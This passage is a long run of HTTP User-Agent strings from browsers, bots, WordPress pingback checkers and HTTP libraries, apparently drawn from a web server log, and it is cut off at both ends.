MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0.1; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0; SM-N900 ) U2/1.0.0 Mobile +WordPress/4.5.24; http://itoshikaiin.com/workshop; verifying pingback from 31.173.100.76 +WhatsApp/2.21.14.17 A +WhatsApp/2.21.14.18 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626044576-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626044577-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625964991-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625973201-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625974872-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625975246-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625984499-0 +WordPress/5.7.2; https://inlogn.nl +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_152; Europe/de) http://yacy.net/bot.html +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 7.0; AS-5433_Secret ) U2/1.0.0 Mobile +WordPress/5.7.2; https://picsture.com +WordPress/5.7.2; https://zdorovieledy.ru +Crawling at Home Project (http://cah.io.community) +WordPress/5.7; https://45soku.com; verifying pingback from 85.26.232.34 +WordPress/5.7.2; https://cee-group.de; verifying pingback from 85.26.232.85 +WordPress/5.3.2; http://jnphotography.ca/blog; verifying pingback from 85.26.233.42 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626048509-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626048521-10 +WordPress/5.7.2; https://lesoutrali.com/fr +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) _zbot +Mozilla/5.0 (X11; Linux x86_64; rv:89.0) adbeat.com/policy Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626051873-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626059099-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626059980-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626085095-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626092965-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626120659-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626132981-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626105971-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.0.1; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1626088122-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626105971-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626105970-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626105972-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 8.1.0; CPH1909 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626135319-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626143460-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626178195-0 +WhatsApp/2.2126.11 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626190530-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626178197-10 +WordPress/5.7.2; http://inagblog.com; verifying pingback from 83.149.37.195 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210712.142617 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626135617-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626143991-10 +WhatsApp/2.21.15.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626179849-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183538-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183536-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626184750-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626188216-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626201869-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626137188-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626146121-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626171938-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626182903-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626185988-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626189979-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626191556-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626192268-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626195204-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626200490-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626203091-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626206948-0 +WordPress/5.7.2; http://trydovoeprav.ru +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210712.142617 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183179-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183239-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210713.175247 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183179-60 +ddg_android/5.90.0 (com.duckduckgo.mobile.android; Android API 28) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183178-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626183239-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626144849-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626144848-0 +GuzzleHttp/6.5.5 curl/7.61.1 PHP/7.4.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626287215-0 +Apache-HttpClient/4.5.12 (Java/1.8.0_282) +WordPress/5.7.2; https://www.croscomputers.net +WordPress/5.4.6; https://advokat-na-yauze.ru; verifying pingback from 190.214.27.201 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626223669-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626235711-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626263502-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626269566-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626286427-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626293034-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626225762-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626237251-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626243647-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626248192-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626257979-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626264899-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626267490-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626270809-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626279400-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626284705-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626285548-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626291555-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626294240-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210713.175247 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 6.0; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210714.145354 +python-requests/2.26.0 +DemandbaseTagMonitor/0.1 (http://www.demandbase.com; info@demandbase.com) +GoogleAuth/1.4 (a5xelte NRD90M); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626308324-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626317828-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626367951-0 +WhatsApp/2.21.15.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626378666-0 +GuzzleHttp/6.5.5 curl/7.58.0 PHP/7.4.21 +Apache-HttpClient/4.5.13 (Java/11.0.10) +WordPress/5.2.11; http://hemirace.com; verifying pingback from 178.176.75.94 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626311165-10 +WhatsApp/2.21.15.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626378421-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626382815-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626310812-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626317695-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626317694-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626321365-0 +PostmanRuntime/7.28.2 +WordPress/5.7.2; http://sovetprav.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626356574-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626363955-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626371534-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210714.145354 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626381028-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Mobile Safari/537.36 PTST/210714.145354 +PHP-Curl-Class/8.10.0 (+https://github.com/php-curl-class/php-curl-class) PHP/7.3.28 curl/7.58.0 +Debian APT-HTTP/1.3 (2.2.4) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626394294-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626400873-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +WordPress/5.7.2; https://englishs.mycafe24.com +WordPress/5.7.2; https://blog.sitekeys.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626427959-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626449697-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626449699-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626395896-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626403242-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626406323-0 +WhatsApp/2.21.15.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626452458-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626452530-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 6.0.1; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Mobile Safari/537.36 PTST/210716.193440 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 PTST/210716.193440 +ddg_android/5.90.0 (com.duckduckgo.mobile.android; Android API 29) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626401249-0 +WordPress/5.7.2; https://bramjbook.com +WordPress/5.7.2; https://studioblue.co +Mechanize/2.8.1 Ruby/2.7.2p137 (http://github.com/sparklemotion/mechanize/) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 8.0.0; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.7.2; https://adobomagazine.com; verifying pingback from 83.169.216.106 +WordPress/5.7.2; https://uk-pomoshnik.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626487719-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626487747-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626542214-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626542216-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626483895-0 +facebookexternalhit/1.1; Mozilla/5.0 (compatible; NaverTalk/1.0) ogcrawler +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626492186-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626504612-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626505364-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626518220-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626521516-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626553602-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626553624-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 8.0.0; SM-C111 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://linuxhint.com +GoogleAuth/1.4 (crownqltesq QP1A.190711.020); gzip,gzip(gfe),gzip(gfe) +googleauth/1.4(a50PPR1.180610.011);gzip,gzip(gfe),gzip(gfe) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.2; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +WordPress/5.6.4; http://minceur.skaka.org; verifying pingback from 197.155.230.206 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 